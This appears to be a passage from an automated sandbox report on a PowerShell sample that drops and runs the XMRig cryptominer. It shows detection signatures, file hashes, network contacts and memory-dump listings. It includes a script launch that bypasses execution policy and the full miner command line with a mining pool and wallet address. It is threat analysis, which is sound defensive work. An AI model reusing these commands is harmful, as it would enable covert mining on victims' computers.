memory/4740-128-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-129-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-130-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-131-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-132-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-133-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-134-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-135-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-136-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-137-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-138-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-139-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-140-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-141-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-142-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-143-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-144-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-145-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-146-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-147-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-148-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-149-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-150-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-151-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-152-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-153-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-154-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-155-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
memory/4740-156-0x00007FF65E890000-0x00007FF65F4C3000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:21
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2688 wrote to memory of 2744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2688 wrote to memory of 2744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/2688-0-0x00007FFCB2863000-0x00007FFCB2865000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xebruu3r.qls.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2688-9-0x000001B2421C0000-0x000001B2421E2000-memory.dmp
memory/2688-10-0x00007FFCB2860000-0x00007FFCB3322000-memory.dmp
memory/2688-11-0x00007FFCB2860000-0x00007FFCB3322000-memory.dmp
memory/2688-12-0x00007FFCB2860000-0x00007FFCB3322000-memory.dmp
memory/2688-14-0x000001B25A800000-0x000001B25A812000-memory.dmp
memory/2688-15-0x000001B242250000-0x000001B24225A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2744-46-0x000001B3BA220000-0x000001B3BA240000-memory.dmp
memory/2744-47-0x000001B44DFA0000-0x000001B44DFC0000-memory.dmp
memory/2744-48-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2688-50-0x00007FFCB2860000-0x00007FFCB3322000-memory.dmp
memory/2744-49-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-52-0x000001B44E610000-0x000001B44E630000-memory.dmp
memory/2744-51-0x000001B44E5F0000-0x000001B44E610000-memory.dmp
memory/2688-53-0x00007FFCB2863000-0x00007FFCB2865000-memory.dmp
memory/2688-54-0x00007FFCB2860000-0x00007FFCB3322000-memory.dmp
memory/2688-55-0x00007FFCB2860000-0x00007FFCB3322000-memory.dmp
memory/2744-56-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-57-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-58-0x000001B44E5F0000-0x000001B44E610000-memory.dmp
memory/2744-59-0x000001B44E610000-0x000001B44E630000-memory.dmp
memory/2744-60-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-61-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-62-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-63-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-64-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-65-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-66-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-67-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-68-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-69-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-70-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-71-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-72-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-73-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-74-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-75-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-76-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-77-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-78-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-79-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-80-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-81-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-82-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-83-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-84-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-85-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-86-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-87-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-88-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-89-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-90-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-91-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-92-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-93-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-94-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-95-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-96-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-97-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-98-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-99-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-100-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-101-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-102-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-103-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-104-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-105-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-106-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-107-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-108-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-109-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-110-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-111-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-112-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-113-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-114-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-115-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-116-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-117-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
memory/2744-118-0x00007FF691780000-0x00007FF6923B3000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:29
Platform
win10v2004-20240226-en
Max time kernel
1794s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 868 wrote to memory of 4592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 868 wrote to memory of 4592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4288 --field-trial-handle=2272,i,4858140932023865871,5726683989663339295,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2272,i,4858140932023865871,5726683989663339295,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| FR | 142.250.178.138:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | 138.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/868-0-0x00007FFDB9F93000-0x00007FFDB9F95000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m2oxr122.wbe.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/868-10-0x0000028CB6DA0000-0x0000028CB6DC2000-memory.dmp
memory/868-11-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmp
memory/868-12-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmp
memory/868-13-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmp
memory/868-15-0x0000028CB6E20000-0x0000028CB6E32000-memory.dmp
memory/868-16-0x0000028CB6E10000-0x0000028CB6E1A000-memory.dmp
memory/868-40-0x00007FFDB9F93000-0x00007FFDB9F95000-memory.dmp
memory/868-41-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4592-49-0x0000019EC0790000-0x0000019EC07B0000-memory.dmp
memory/868-50-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmp
memory/4592-51-0x0000019EC07D0000-0x0000019EC07F0000-memory.dmp
memory/868-52-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmp
memory/4592-53-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-54-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-57-0x0000019EC0810000-0x0000019EC0830000-memory.dmp
memory/4592-55-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-56-0x0000019EC07F0000-0x0000019EC0810000-memory.dmp
memory/4592-58-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-59-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-61-0x0000019EC0810000-0x0000019EC0830000-memory.dmp
memory/4592-60-0x0000019EC07F0000-0x0000019EC0810000-memory.dmp
memory/4592-62-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-63-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-64-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-65-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-66-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-67-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-68-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-69-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-70-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-71-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-72-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-73-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-74-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-75-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-76-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-77-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-78-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-79-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-80-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-81-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-82-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-83-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-84-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-85-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-86-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-87-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-88-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-89-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-90-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-91-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-92-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-93-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-94-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-95-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-96-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-97-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-98-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-99-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-100-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-101-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-102-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-103-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-104-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-105-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-106-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-107-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-108-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-109-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-110-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-111-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-112-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-113-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-114-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-115-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-116-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
